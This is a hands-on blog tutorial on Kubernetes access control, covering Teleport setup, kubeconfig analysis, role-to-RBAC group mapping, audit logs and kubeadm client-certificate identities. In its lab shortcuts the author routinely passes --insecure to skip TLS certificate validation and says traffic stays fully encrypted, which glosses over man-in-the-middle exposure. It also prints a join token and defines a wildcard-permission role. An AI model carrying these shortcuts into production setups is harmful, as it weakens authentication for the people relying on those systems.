That’s your full access proxy running locally. The Teleport web UI comes up at https://192.168.64.4:3080 (or whatever IP address you have).

Create your first user

Fire up another terminal and connect to your Docker container, which you can find by the usual Docker command:

matt@controlplane:~$ docker ps
CONTAINER ID   IMAGE          COMMAND       CREATED      STATUS          PORTS                                       NAMES
7867833a79e8   ubuntu:22.04   "/bin/bash"   3 days ago   Up 27 minutes   0.0.0.0:3080->443/tcp, [::]:3080->443/tcp   heuristic_sammet
matt@controlplane:~$ docker exec -it 7867833a79e8 bash
root@7867833a79e8:/#

Then create a user for the Teleport UI (I kept the logins from the docs, but you don't need them).

tctl users add teleport-admin --roles=editor,access --logins=root,ubuntu,ec2-user

You’ll get a signup link. Open it in your browser to complete the setup and enable OTP. Annoying, but it gets worse later.

We're making good progress.

Integrating Kubernetes with Teleport

You'll notice a lot of resource options in the UI, but we'll stick with Kubernetes. On the Kubernetes side, it just requires you to follow the resource enrollment process.

Enroll Kubernetes Resource

Install the helm chart.

helm repo add teleport https://charts.releases.teleport.dev && helm repo update

Configure the cluster values and you'll get a command like follows, that you run in your terminal.

cat << EOF > prod-cluster-values.yaml
roles: kube,app,discovery
authToken: 3bdc40c408f1cd8809daeadfd83202e4
proxyAddr: 192.168.64.4:3080
kubeClusterName: kubernetes
labels:
    teleport.internal/resource-id: d5319a0c-5db5-4916-9984-8a598f2ae740

EOF

helm install teleport-agent teleport/teleport-kube-agent -f prod-cluster-values.yaml --version 18.2.4 \
--create-namespace --namespace teleport

You might change it to helm upgrade --install instead. You never know if you'll have to run it again.

Once the agent registers successfully, it appears in the Teleport UI under Kubernetes Clusters.
We'll come back to this.

Connect Client

Now we need to install our client. I went to a completely different Ubuntu machine that had no kubeconfig but was still on the same network.

Install Teleport client

sudo apt install -y apt-transport-https
curl https://deb.releases.teleport.dev/teleport-pubkey.asc | sudo tee /usr/share/keyrings/teleport-archive-keyring.asc
echo "deb [signed-by=/usr/share/keyrings/teleport-archive-keyring.asc] https://deb.releases.teleport.dev/ stable main" | sudo tee /etc/apt/sources.list.d/teleport.list
sudo apt update && sudo apt install teleport

Verify:

matt@linux-server-1:~$ tsh version
Teleport v18.2.4 git:v18.2.4-0-gb7ab869 go1.24.7

Cool we're all set. Except you probably don't have kubectl! So one more step.

sudo apt-get update
sudo apt-get install -y apt-transport-https ca-certificates curl gnupg
curl -fsSL https://pkgs.k8s.io/core:/stable:/v1.34/deb/Release.key | sudo gpg --dearmor -o /etc/apt/keyrings/kubernetes-apt-keyring.gpg
sudo chmod 644 /etc/apt/keyrings/kubernetes-apt-keyring.gpg
echo 'deb [signed-by=/etc/apt/keyrings/kubernetes-apt-keyring.gpg] https://pkgs.k8s.io/core:/stable:/v1.34/deb/ /' | sudo tee /etc/apt/sources.list.d/kubernetes.list
sudo chmod 644 /etc/apt/sources.list.d/kubernetes.list 
sudo apt-get update
sudo apt-get install -y kubectl

Now for the finale. In the Teleport UI, select your Kubernetes resource and copy the tsh command shown under “Connect”.

Run it to connect:

matt@linux-server-1:~$ tsh login --proxy=192.168.64.4:3080 --auth=local --user=teleport-admin teleport
ERROR: WARNING:

  The proxy you are connecting to has presented a certificate signed by a
  unknown authority. This is most likely due to either being presented
  with a self-signed certificate or the certificate was truly signed by an
  authority not known to the client.

  If you know the certificate is self-signed and would like to ignore this
  error use the --insecure flag.

  If you have your own certificate authority that you would like to use to
  validate the certificate chain presented by the proxy, set the
  SSL_CERT_FILE and SSL_CERT_DIR environment variables respectively and try
  again.

  If you think something malicious may be occurring, contact your Teleport
  system administrator to resolve this issue.

Oops bad cert, so let's bypass that and login in with your password and OTP. Note: --insecure only skips TLS validation to your local proxy, your Kubernetes traffic is still fully encrypted.

matt@linux-server-1:~$ tsh login --proxy=192.168.64.4:3080 --auth=local --user=teleport-admin teleport --insecure
Enter password for Teleport user teleport-admin:
WARNING: You are using insecure connection to Teleport proxy https://192.168.64.4:3080
Enter an OTP code from a device:
> Profile URL:        https://192.168.64.4:3080
  Logged in as:       teleport-admin
  Cluster:            teleport
  Roles:              access, editor
  Logins:             root, ubuntu, ec2-user
  Kubernetes:         enabled
  Kubernetes cluster: "kubernetes"
  Kubernetes users:   teleport-admin
  Kubernetes groups:  system:masters
  Valid until:        2025-10-19 02:17:46 -0700 PDT [valid for 12h0m0s]
  Extensions:         login-ip, permit-agent-forwarding, permit-port-forwarding, permit-pty, private-key-policy

Switch Kubernetes context and you can see the nodes:

matt@linux-server-1:~$ tsh kube login kubernetes --insecure
matt@linux-server-1:~/teleport$ kubectl get nodes
NAME           STATUS   ROLES           AGE    VERSION
controlplane   Ready    control-plane   366d   v1.31.8
kubeworker1    Ready              258d   v1.31.8

And there it is — the aha moment. No static ~/.kube/config, just short-lived, identity-based access that expires when it should. I promise this would be way easier with an EKS cluster.

Dissecting the Teleport-Generated Kubernetes Context

After logging in with:

tsh login --proxy=192.168.64.4:3080 --auth=local --user=teleport-admin --insecure

You’ve now got a short-lived identity with these traits:

Teleport Cluster: teleport
User: teleport-admin
Roles: access, editor
Kubernetes: enabled
Kubernetes Cluster: kubernetes
Kubernetes Groups: system:masters
Validity: 12 hours

As we saw before, running kubectl get nodes confirms access:

controlplane   Ready    control-plane   366d   v1.31.8
kubeworker1    Ready              258d   v1.31.8

What Teleport Did

Teleport issued short-lived client certificates and injected a Kubernetes context into your kubeconfig that points kubectl to Teleport’s Kubernetes proxy (:3026). Grab it as follows.

matt@linux-server-1:~$ cat .kube/config

The Teleport-generated kubeconfig section

apiVersion: v1
clusters:
- name: teleport-kube
  cluster:
    server: https://192.168.64.4:3026
    certificate-authority-data:  PEM>
contexts:
- name: teleport-admin@teleport-kube
  context:
    cluster: teleport-kube
    user: teleport-admin@teleport-kube
    namespace: default
current-context: teleport-admin@teleport-kube
users:
- name: teleport-admin@teleport-kube
  user:
    client-certificate-data:  PEM>
    client-key-data:  PEM>

The server field shows that kubectl talks to the Teleport proxy rather than directly to the Kubernetes API server. Teleport validates your cert, maps your roles → K8s groups, and forwards the request securely.

Parsing Your Teleport-Injected kubeconfig

Here’s the kubeconfig your test box is using after tsh login (redacted):

apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: 
    server: https://192.168.64.4:3080
    tls-server-name: kube-teleport-proxy-alpn.teleport.cluster.local
  name: teleport
contexts:
- context:
    cluster: teleport
    extensions:
    - extension: kubernetes
      name: teleport.kube.name
    user: teleport-kubernetes
  name: teleport-kubernetes
current-context: teleport-kubernetes
kind: Config
preferences: {}
users:
- name: teleport-kubernetes
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      args:
      - kube
      - credentials
      - --kube-cluster=kubernetes
      - --teleport-cluster=teleport
      - --proxy=192.168.64.4:3080
      - --insecure
      command: /opt/teleport/system/bin/tsh
      env: null
      provideClusterInfo: false

Reading the kubeconfig (mostly right)

Teleport injects three major blocks — cluster, context, and user — each representing a layer in the connection chain.

Cluster

clusters:
- name: teleport
  cluster:
    server: https://192.168.64.4:3080
    tls-server-name: kube-teleport-proxy-alpn.teleport.cluster.local
    certificate-authority-data:  PEM>

server: Teleport proxy URL, not direct API server.
tls-server-name: SNI/ALPN hint so the proxy knows you’re targeting Kubernetes.
certificate-authority-data: CA bundle trusted for proxy cert validation.

Context

contexts:
- name: teleport-kubernetes
  context:
    cluster: teleport
    user: teleport-kubernetes
    extensions:
    - name: teleport.kube.name
      extension: kubernetes
current-context: teleport-kubernetes

context: Binds Teleport cluster to Kubernetes user.
extensions: Teleport hint for cluster name.
current-context: The one kubectl will use.

User

users:
- name: teleport-kubernetes
  user:
    exec:
      command: /opt/teleport/system/bin/tsh
      args:
      - kube
      - credentials
      - --kube-cluster=kubernetes
      - --teleport-cluster=teleport
      - --proxy=192.168.64.4:3080
      - --insecure
      apiVersion: client.authentication.k8s.io/v1beta1

exec.command: tsh is your auth plugin.
args: Mint short-lived credentials on demand.
apiVersion: Defines plugin schema for Kubernetes.

Each time kubectl runs, it shells out to tsh to request new ephemeral credentials. The proxy validates, maps your Teleport roles to Kubernetes groups, and forwards the request to the actual API server.

Confirming Role Mapping

Teleport roles map to Kubernetes RBAC groups. In your case:

tsh status
...
  Kubernetes users:   teleport-admin
  Kubernetes groups:  system:masters
...

This gives you cluster-admin privileges because system:masters maps to the built-in cluster-admin ClusterRoleBinding. RBAC we've already learned, but good to check.

Check it with a hacky grep — we’re searching ClusterRoleBindings for any subject bound to system:masters:

matt@controlplane:~$ kubectl get clusterrolebindings -o yaml | grep -B20 -A5 "system:masters"
    name: calico-typha
    namespace: calico-system
- apiVersion: rbac.authorization.k8s.io/v1
  kind: ClusterRoleBinding
  metadata:
    annotations:
      rbac.authorization.kubernetes.io/autoupdate: "true"
    creationTimestamp: "2024-10-17T19:53:04Z"
    labels:
      kubernetes.io/bootstrapping: rbac-defaults
    name: cluster-admin
    resourceVersion: "134"
    uid: 640338d1-5f25-4c59-bdca-893969ecb818
  roleRef:
    apiGroup: rbac.authorization.k8s.io
    kind: ClusterRole
    name: cluster-admin
  subjects:
  - apiGroup: rbac.authorization.k8s.io
    kind: Group
    name: system:masters
- apiVersion: rbac.authorization.k8s.io/v1
  kind: ClusterRoleBinding
  metadata:
    annotations:
      meta.helm.sh/release-name: gatekeeper

Then you can prove this capability out.

matt@linux-server-1:~$ kubectl auth can-i --list | head -n 20
Resources                                       Non-Resource URLs   Resource Names   Verbs
*.*                                             []                  []               [*]
                                                [*]                 []               [*]
selfsubjectreviews.authentication.k8s.io        []                  []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                  []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                  []               [create]
globalnetworkpolicies.projectcalico.org         []                  []               [get list watch create update patch delete deletecollection]
networkpolicies.projectcalico.org               []                  []               [get list watch create update patch delete deletecollection]
                                                [/api/*]            []               [get]
                                                [/api]              []               [get]
                                                [/apis/*]           []               [get]
                                                [/apis]             []               [get]
                                                [/healthz]          []               [get]
                                                [/healthz]          []               [get]
                                                [/livez]            []               [get]
                                                [/livez]            []               [get]
                                                [/openapi/*]        []               [get]
                                                [/openapi]          []               [get]
                                                [/readyz]           []               [get]
                                                [/readyz]           []               [get]
matt@linux-server-1:~$ kubectl auth can-i delete nodes
Warning: resource 'nodes' is not namespace scoped

yes

Not too bad so far.

Comparing Before and After Teleport

Before Teleport, your kubeconfig looked like this:

apiVersion: v1
clusters:
- cluster:
    server: https://192.168.64.4:6443
    certificate-authority-data:  PEM>
  name: kubernetes
contexts:
- context:
    cluster: kubernetes
    user: kubernetes-admin
  name: kubernetes-admin@kubernetes
current-context: kubernetes-admin@kubernetes
users:
- name: kubernetes-admin
  user:
    client-certificate-data:  PEM>
    client-key-data:  PEM>

This default kubeadm config uses static client certs with no central control or expiration. If it leaks, it’s effectively unlimited admin access.

After Teleport, things are much better (no forever pass):

Short-lived credentials via tsh
Proxy-mediated access
Role-based identity enforcement
Automatic expiry & audit

Aspect	Before Teleport	After Teleport
Credential type	Static admin cert	Short-lived cert via `tsh`
Endpoint	Direct to API server	Through Teleport proxy
Identity	Hardcoded user	Role-based (`teleport-admin`)
Expiry	Manual rotation	Auto-expires (12h)
Audit	None	Centralized logs & sessions

Create New Roles and Users

We’ll now create a minimal setup:

Teleport role → maps to a Kubernetes group
Teleport user → inherits that role
ClusterRoleBinding → grants the group permissions

This follows from the documentation, but also goes a little deeper.

1) Teleport Role: `junior-devs` → maps to K8s `view`.

Save the following as junior-devs.yaml. This creates Teleport role that will give our user Kubernetes access.

kind: role
version: v7
metadata:
  name: junior-devs
spec:
  allow:
    logins: ['{{internal.logins}}']
    kubernetes_groups: ['{{internal.kubernetes_groups}}']
    node_labels:
      '*': '*'
    kubernetes_labels:
      '*': '*'
    kubernetes_resources:
      - kind: '*'
        namespace: '*'
        name: '*'
        verbs: ['*']

Apply on the Auth host with tctl:

root@7867833a79e8:~# tctl create junior-devs.yaml
role "junior-devs" has been created

2) Teleport User: `jimbo` with role `junior-devs`.

Save the following as jimbo.yaml. Creates a Teleport user that binds to the Teleport role of junior-devs and the Kubernetes group of teleport-view.

kind: user
version: v2
metadata:
  name: jimbo
spec:
  roles: ['junior-devs']
  traits:
    kubernetes_groups: ['teleport-view']

Apply on the Auth host with tctl:

root@7867833a79e8:~# tctl create -f jimbo.yaml
user "jimbo" has been created

To log in as jimbo, you'll need to repeat the user enrollment process again. After creating the user, go to the UI and reset authentication on the jimbo user account. This gave a new link to sign up with OTP (damn OTP, I now have way too many Teleport tokens).

Now for the actual log in:

matt@linux-server-1:~/teleport$ tsh login --proxy=192.168.64.4:3080 --auth=local --user=jimbo --insecure
Enter password for Teleport user jimbo:
WARNING: You are using insecure connection to Teleport proxy https://192.168.64.4:3080
Enter an OTP code from a device:
> Profile URL:        https://192.168.64.4:3080
  Logged in as:       jimbo
  Cluster:            teleport
  Roles:              junior-devs
  Kubernetes:         enabled
  Valid until:        2025-10-20 22:27:09 -0700 PDT [valid for 12h0m0s]
  Extensions:         login-ip, permit-port-forwarding, permit-pty, private-key-policy

matt@linux-server-1:~/teleport$ tsh kube ls
Kube Cluster Name Labels Selected
----------------- ------ --------
kubernetes

matt@linux-server-1:~/teleport$ tsh kube login kubernetes --insecure
Logged into Kubernetes cluster "kubernetes". Try 'kubectl version' to test the connection.

3) Kubernetes ClusterRoleBinding for the `view` group

If you don't have the ClusterRoleBinding you are sort of in a bind.

matt@linux-server-1:~/teleport$ kubectl get po
Error from server (Forbidden): pods is forbidden: User "jimbo" cannot list resource "pods" in API group "" in the namespace "default"

Since Teleport injects kubernetes_groups: ["teleport-view"], you'll need to bind that group to the built‑in view role.

Create the ClusterRoleBinding in a separate terminal.

matt@controlplane:~$ kubectl create clusterrolebinding teleport-view   --clusterrole=view   --group=teleport-view
clusterrolebinding.rbac.authorization.k8s.io/teleport-view created

Then verify you can use the view role.

matt@linux-server-1:~/teleport$ kubectl get po
NAME                        READY   STATUS    RESTARTS       AGE
flask-app-ccb7dbb5b-5x5qw   1/1     Running   5 (45h ago)    19d
nginx-676b6c5bbc-45cmn      1/1     Running   13 (45h ago)   137d

And that's that.

Teleport UI

Teleport Role: Go to Zero Trust Access -> Roles and choose Create New Role. Then supply the name and choose Kubernetes Access with a default Kubernetes resource:

Teleport User: Go to Zero Trust Access -> Users and choose Create New User. Then fill in the name, role, and trait (kubernetes_groups).

K8s Binding: Still done in Kubernetes as above.

Status Check

This completes a minimal identity → group → RBAC pipeline: Teleport defines who Jimbo is, Kubernetes RBAC decides what Jimbo can do. Easily done via code or UI.

Teleport Kubernetes Audit

Teleport logs every Kubernetes request. You can see this both in proxy logs and the UI. Let's take a look.

This is for a simple request.

matt@linux-server-1:~$ kubectl get deployment
NAME                 STATUS   AGE
calico-apiserver     Active   367d
calico-system        Active   367d
default              Active   367d
...

Proxy round‑trip (reverse proxy)

You can find this in the running teleport Docker instance, when you submit a request. The following is a concise parsing of your proxy round‑trip log and the corresponding kube.request audit event (both the raw line and the UI JSON).

2025-10-20T05:03:04.563Z INFO [PROXY:PRO] Round trip completed pid:17.1 method:GET url:https://kube-teleport-proxy-alpn.teleport.cluster.local/apis/apps/v1/namespaces/default/deployments?limit=500 code:200 duration:18.776759ms tls.version:772 tls.resume:false tls.csuite:4865 tls.server:kube-teleport-proxy-alpn.teleport.cluster.local reverseproxy/reverse_proxy.go:255

Key fields (what they mean):

method: GET — HTTP verb kubectl used.
url: .../apis/apps/v1/namespaces/default/deployments?limit=500 — Exact Kubernetes API path.
code: 200 — Upstream API server response.
tls.version / csuite / server: TLS details for the upstream hop inside Teleport (ALPN → Kube proxy).

This is the raw transport layer evidence: Teleport successfully proxied a K8s API call and got a 200 back.

UI JSON (same event)

Access the Teleport UI and you can view nicely formatted audit logs.

And clicking into details you see the JSON.

Here it is the actual request in all its glory.

{
  "addr.remote": "192.168.64.8:33222",
  "cluster_name": "teleport",
  "code": "T3009I",
  "ei": 0,
  "event": "kube.request",
  "kubernetes_cluster": "kubernetes",
  "kubernetes_groups": [
    "system:masters",
    "system:authenticated"
  ],
  "kubernetes_labels": {
    "teleport.internal/resource-id": "11beab83-a0fa-48b5-8e1f-fd454a7f714c"
  },
  "kubernetes_users": [
    "teleport-admin"
  ],
  "login": "teleport-admin",
  "namespace": "default",
  "proto": "kube",
  "request_path": "/apis/apps/v1/namespaces/default/deployments",
  "resource_api_group": "apps/v1",
  "resource_kind": "deployments",
  "resource_namespace": "default",
  "response_code": 200,
  "server_hostname": "teleport",
  "server_id": "785ed329-bb9b-4d16-8904-1b50d75377b5",
  "server_labels": {
    "teleport.internal/resource-id": "11beab83-a0fa-48b5-8e1f-fd454a7f714c"
  },
  "server_version": "18.2.4",
  "sid": "",
  "time": "2025-10-20T05:03:04.565Z",
  "uid": "9544742b-2cfa-49d9-abab-edd7e7b06554",
  "user": "teleport-admin",
  "user_cluster_name": "teleport",
  "user_kind": 1,
  "user_roles": [
    "access",
    "editor"
  ],
  "user_traits": {
    "kubernetes_groups": [
      "system:masters"
    ],
    "kubernetes_users": [
      "teleport-admin"
    ],
    "logins": [
      "root",
      "ubuntu",
      "ec2-user"
    ]
  },
  "verb": "GET"
}

A Logic of Sorts for the JSON:

Although you can surely decipher most of these, here is a rough map from a less technical point of view. Simple, clean, and fully auditable.

Category	Fields
Who	`user`, `login`, `user_roles`, `kubernetes_groups`
What	`verb`, `resource_kind`, `resource_api_group`
Where	`namespace`, `cluster_name`, `addr.remote`
When	`time`, `uid`
Result	`response_code`
Server	`server_id`, `server_hostname`, `server_version`

Wrap-Up: Access Control, Actually Done

That’s a wrap — for now — on Teleport and Kubernetes access.

What started as a quick experiment to make kubeconfig a little safer turned into an interesting, albeit time consuming exercise. The more I used Teleport, the more I see how it’s replacing an entire trust model.

Short-lived certs instead of forever-tokens
Centralized user and role management
Audit trails that are at your fingertips

Teleport is not just for Kubernetes, but it is clearly useful for leveling up Kubernetes RBAC. Teleport isn’t trying to reinvent Kubernetes security; it’s trying to make identity-aware access sane.

I’ll probably revisit this when I start layering in SSO and stuff, but for now? It’s a clean, comprehensible access model that’s hard not to like.

Access Control, Actually: Kubeadm and the Roots of Kubernetes Access

Matt Brown — Mon, 13 Oct 2025 20:58:28 GMT

Let’s start simple: you’ve got a Kubernetes cluster running in your lab. How do you get into it?
The easiest way — the one you will always use in a lab running on your laptop — is to SSH directly into a node. You run:

matt.brown@matt ~ % ssh matt@192.168.64.15
...
matt@ciliumcontrolplane:~$ kubectl get po
No resources found in default namespace.

Boom. You’re in. No VPN, no IAM, no hoops. It works because that node has kubectl and a service account with cluster-admin rights. But it’s also the worst possible way to manage access. That SSH key sitting on your laptop? It’s permanent. The cluster logs? They’ll only tell you “user: ubuntu.” If multiple people share that key, you’re in the dark.

This post kicks off a short series exploring how we actually access Kubernetes. From SSH and bastions to identity-aware access with Teleport. The goal is to look at what happens between “I need to connect to that cluster” and “who ran that command.”

Who Am I?

So now that I’m on the node — who exactly am I? Run whoami, and Linux will tell you the obvious.

matt@controlplane:~$ whoami
matt

That’s great. I’m matt, local user, shell access confirmed. But who does Kubernetes think I am? The moment I type kubectl get pods, kubectl uses whatever credentials are sitting under ~/.kube/config or the node’s service account token.

In practice, that means I’m probably acting as system:admin or a service account with cluster-admin rights, because that’s what the node was bootstrapped with.

If I check the current context, I’ll see something like this.

matt@controlplane:~$ kubectl config current-context
kubernetes-admin@kubernetes

Cool — I’m “kubernetes-admin@kubernetes.” Not this admin, not that admin — just kubernetes-admin.

Contexts, Users, and Clusters (a quick decoding)

A Kubernetes context is just a tuple that brings together three things from your kubeconfig:

Field	Meaning
Cluster	Which API server you’re talking to (its address and CA cert).
User	Which credential you’re using (client cert, token, exec plugin, etc.).
Namespace	The default namespace for commands when you don’t specify one.

So when kubectl config current-context prints kubernetes-admin@kubernetes, it’s shorthand for: “Use the user kubernetes-admin when connecting to the cluster named kubernetes.” It means the certificate in your kubeconfig file identifies you as the logical user kubernetes-admin.

If you check your kubeconfig (~/.kube/config), you’ll see something like:

apiVersion: v1
users:
- name: kubernetes-admin
  user:
    client-certificate-data: REDACTED
    client-key-data: REDACTED

clusters:
- name: kubernetes
  cluster:
    certificate-authority-data: REDACTED
    server: https://192.168.64.4:6443

current-context: kubernetes-admin@kubernetes
kind: Config
preferences: {}

contexts:
- name: kubernetes-admin@kubernetes
  context:
    cluster: kubernetes
    user: kubernetes-admin

That’s where the magic lives — in this simple static config file. In the lab, it was created when the cluster was bootstrapped with kubeadm, and it uses a client certificate signed by the cluster’s Certificate Authority (CA).

The client-certificate-data and client-key-data fields are just base64-encoded TLS credentials: a certificate and private key that prove who you are to the Kubernetes API server. They’re signed by the cluster’s CA during bootstrap, which is why the API server trusts them without any further login. In short: when kubectl connects, it presents that cert–key pair, and the API server says, “yep, that’s my guy!”

The CA’s own certificates and keys live on every control-plane node under /etc/kubernetes/pki/. They’re not stored in etcd, as I once thought. Each control-plane node has a copy so it can verify incoming connections and issue new certs if it’s ever elected to run the API server.

It’s meant for bootstrapping, not daily use. But because it works — and because it never expires until the cert does — it quietly becomes the kubeconfig you keep using forever.

The Auth Chain of kubectl

Now that we know who we are, we can ask what actually happens when you run a simple command like:

kubectl get pods

Every part of your kubeconfig file gets pulled into action:

kubectl reads your current context
It looks up the current-context (kubernetes-admin@kubernetes) to find which cluster and user to use.
kubectl authenticates to the API server
It connects to the cluster’s API endpoint (from clusters.server) and presents your client certificate and key (from users.user). This is mutual TLS.
The API server validates your certificate
The API server checks your client certificate against the cluster’s CA, stored locally on the control-plane node under /etc/kubernetes/pki/ca.crt. If the signature is valid, it extracts the subject (like CN=kubernetes-admin) and uses that as your Kubernetes identity.
Kubernetes decides what you’re allowed to do
Once authenticated, authorization kicks in. The API server checks your identity against RBAC roles and role bindings, which are stored in etcd. That’s what determines whether kubectl get pods returns a list — or a Forbidden message.
Audit trail (if enabled)
Finally, the API server logs the request with your derived identity:
```
 user="kubernetes-admin" verb="list" resource="pods"
```

In short, the chain looks like this:

kubectl → client certificate → API server → local CA trust → RBAC (etcd)

It’s all local, self-contained, and cryptographically verified. Of course, if that client certificate gets shared or stolen, the API server will happily authenticate anyone holding it. There’s no MFA, no identity federation, and no notion of who the human really was behind the request.

What Can I Do?

Once the API server validates your identity, it moves from authentication to authorization. Every request coming into Kubernetes carries the user identity that was derived from your authentication method.

For example, after validating your client certificate, the API server sees you as:

user="kubernetes-admin"
groups=["system:authenticated"]

It now checks that identity against Kubernetes RBAC (Role-Based Access Control).

RBAC 101

Kubernetes RBAC is built from four object types:

Kind	Scope	Purpose
Role	Namespaced	Set of allowed actions (`verbs`) on resources within a single namespace.
ClusterRole	Cluster-wide	Same as Role, but not bound to a namespace.
RoleBinding	Namespaced	Grants permissions defined in a Role to users, groups, or service accounts.
ClusterRoleBinding	Cluster-wide	Grants ClusterRole permissions across the entire cluster.

Each Role or ClusterRole lists verbs (what actions you can take) and resources (what they apply to).
Bindings then link those rules to actual identities.

Example: Limiting Access

Let’s see this in action by creating a restricted user and verifying permissions.

Step 1 — Create a new user cert

matt@controlplane:~/rbac$ openssl genrsa -out lab-user.key 2048
matt@controlplane:~/rbac$ openssl req -new -key lab-user.key -subj "/CN=lab-user/O=lab-users" -out lab-user.csr
matt@controlplane:~/rbac$ sudo openssl x509 -req -in lab-user.csr   -CA /etc/kubernetes/pki/ca.crt   -CAkey /etc/kubernetes/pki/ca.key   -CAcreateserial   -out lab-user.crt -days 365
Certificate request self-signature ok
subject=CN = lab-user, O = lab-users

Step 2 — Add the user to your kubeconfig

matt@controlplane:~/rbac$ kubectl config set-credentials lab-user   --client-certificate=lab-user.crt   --client-key=lab-user.key
User "lab-user" set.
matt@controlplane:~/rbac$ kubectl config set-context lab-user@kubernetes   --cluster=kubernetes --user=lab-user
Context "lab-user@kubernetes" created.

Step 3 — Try to access pods

matt@controlplane:~/rbac$ kubectl --context lab-user@kubernetes get pods
Error from server (Forbidden): pods is forbidden: User "lab-user" cannot list resource "pods" in API group "" in the namespace "default"

Step 4 — Create a Role and RoleBinding

matt@controlplane:~/rbac$ kubectl create role pod-reader --verb=get,list --resource=pods
role.rbac.authorization.k8s.io/pod-reader created
matt@controlplane:~/rbac$ kubectl create rolebinding pod-read-access   --role=pod-reader   --user=lab-user
rolebinding.rbac.authorization.k8s.io/pod-read-access created

Step 5 — Verify access

matt@controlplane:~/rbac$ kubectl auth can-i list pods --as lab-user
yes
matt@controlplane:~/rbac$ kubectl --context lab-user@kubernetes get pods
NAME                        READY   STATUS    RESTARTS      AGE
flask-app-ccb7dbb5b-5x5qw   1/1     Running   4 (7m ago)    12d
nginx-676b6c5bbc-45cmn      1/1     Running   12 (7m ago)   130d

Now we have it working for pods in the default namespace exactly as expected. That’s where AuthZ meets AuthN. I also cannot believe why that nginx pod is still running.

Cluster RBAC

If you list your ClusterRoles, the output tells the story of your entire cluster:

kubectl get clusterroles

You’ll see something like:

matt@controlplane:~/rbac$ kubectl get clusterroles
NAME                                                                   CREATED AT
admin                                                                  2024-10-17T19:53:04Z
argocd-application-controller                                          2024-10-17T20:27:44Z
...
calico-webhook-reader                                                  2024-10-17T19:55:28Z
cluster-admin                                                          2024-10-17T19:53:04Z
edit                                                                   2024-10-17T19:53:04Z
...
system:certificates.k8s.io:kube-apiserver-client-kubelet-approver      2024-10-17T19:53:04Z
system:certificates.k8s.io:kubelet-serving-approver                    2024-10-17T19:53:04Z
system:controller:attachdetach-controller                              2024-10-17T19:53:04Z
system:controller:certificate-controller                               2024-10-17T19:53:04Z
...
system:kube-dns                                                        2024-10-17T19:53:04Z
system:kube-scheduler                                                  2024-10-17T19:53:04Z
...
system:node-bootstrapper                                               2024-10-17T19:53:04Z
...

Those entries generally come from three places:

Category	Example	Purpose
Built-in roles	`cluster-admin`, `edit`	Human-facing defaults created by Kubernetes itself.
System roles	`system:controller:*`, `system:node`	Internal roles used by control-plane components and kubelets.
Addon roles	`calico-`, `argocd-`	Created by installed operators and charts.

Each of these defines what actions are allowed (verbs) and where they apply (resources, apiGroups). Your authenticated user is matched to one of these via a RoleBinding or ClusterRoleBinding.

For example, the default bootstrap identity kubernetes-admin maps directly to the god-tier cluster-admin role:

subjects:
- kind: User
  name: kubernetes-admin
roleRef:
  kind: ClusterRole
  name: cluster-admin

That’s why everything “just works” in a fresh lab, but it also means you’re running as the same identity and privilege level as the cluster admin.

Assigning Cluster Roles

ClusterRoles define what can be done. ClusterRoleBindings define who can do it.

You can see your bindings with:

kubectl get clusterrolebindings

Example from a kubeadm-based cluster:

kubeadm:cluster-admins                                          ClusterRole/cluster-admin                                                          253d
kubeadm:get-nodes                                               ClusterRole/kubeadm:get-nodes                                                      360d
kubeadm:kubelet-bootstrap                                       ClusterRole/system:node-bootstrapper                                               360d
kubeadm:node-autoapprove-bootstrap                              ClusterRole/system:certificates.k8s.io:certificatesigningrequests:nodeclient       360d
kubeadm:node-autoapprove-certificate-rotation                   ClusterRole/system:certificates.k8s.io:certificatesigningrequests:selfnodeclient   360d
kubeadm:node-proxier                                            ClusterRole/system:node-proxier                                                    360d

Each of these connects an identity (user, group, or service account) to a ClusterRole.

Binding	Role	Subject	Purpose
kubeadm:cluster-admins	`cluster-admin`	Group `kubeadm:cluster-admins`	Grants full cluster-wide privileges.
kubeadm:get-nodes	`kubeadm:get-nodes`	Bootstrap group	Lets components read node info.
kubeadm:kubelet-bootstrap	`system:node-bootstrapper`	`system:bootstrappers:kubeadm:default-node-token`	Allows new nodes to register.
kubeadm:node-autoapprove-bootstrap	`system:certificates.k8s.io:certificatesigningrequests:nodeclient`	`system:bootstrappers:kubeadm:default-node-token`	Auto-approves node CSR during bootstrap.
kubeadm:node-autoapprove-certificate-rotation	`system:certificates.k8s.io:certificatesigningrequests:selfnodeclient`	Group `system:nodes`	Lets kubelets rotate their client certs.
kubeadm:node-proxier	`system:node-proxier`	ServiceAccount `kube-system:kube-proxy`	Lets `kube-proxy` manage endpoints and services.

In short:

ClusterRoles define privileges.
ClusterRoleBindings assign them to identities.
The API server enforces that mapping on every request.

Following the Binding Chain

Now let’s dig into the default admin binding:

matt@controlplane:~/rbac$ kubectl describe clusterrolebinding kubeadm:cluster-admins
Name:         kubeadm:cluster-admins
Labels:       
Annotations:  
Role:
  Kind:  ClusterRole
  Name:  cluster-admin
Subjects:
  Kind   Name                    Namespace
  ----   ----                    ---------
  Group  kubeadm:cluster-admins

Notice it doesn’t bind to a specific user — instead, it references a group that the user belongs to.
In your lab, that group mapping comes from the client certificate issued during cluster bootstrap.

You can inspect it yourself:

matt@controlplane:~/rbac$ kubectl config view --minify --raw -o jsonpath='{.users[0].user.client-certificate-data}' | base64 -d | openssl x509 -noout -subject
subject=O = system:masters, CN = kubernetes-admin

Here’s what that means:

CN (Common Name) → your username, kubernetes-admin
O (Organization) → your group, system:masters

When the API server validates this certificate, it extracts both:

User:  CN=kubernetes-admin
Group: O=system:masters

That system:masters group is special as it’s automatically bound to the cluster-admin role by default in kubeadm clusters. In other words, anyone presenting a valid cert with O=system:masters skips straight to full admin rights. It’s convenient for bootstrapping and that is probably its only advantage.

A quick peek at system:masters from its ClusterRoleBinding:

matt@controlplane:~$ kubectl get clusterrolebinding cluster-admin -o yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  annotations:
    rbac.authorization.kubernetes.io/autoupdate: "true"
  creationTimestamp: "2024-10-17T19:53:04Z"
  labels:
    kubernetes.io/bootstrapping: rbac-defaults
  name: cluster-admin
  resourceVersion: "134"
  uid: 640338d1-5f25-4c59-bdca-893969ecb818
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:masters

That’s how your identity maps to permissions:

kubernetes-admin (user)
  ↓
system:masters (group)
